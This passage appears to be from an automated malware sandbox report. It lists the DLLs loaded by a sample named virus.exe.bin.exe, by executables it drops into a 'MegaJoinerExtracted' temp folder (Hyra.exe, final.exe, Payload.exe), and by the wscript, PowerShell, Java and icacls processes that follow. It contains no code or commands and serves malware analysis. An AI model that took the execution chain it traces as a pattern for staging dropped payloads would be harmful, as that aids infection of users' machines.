Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\virus.exe.bin.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: d3d9.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dwmapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: d3d10warp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: resourcepolicyclient.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dxcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dwrite.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dataexchange.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: d3d11.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dcomp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dxgi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: twinapi.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: textinputframework.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: coreuicomponents.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: edputil.dll
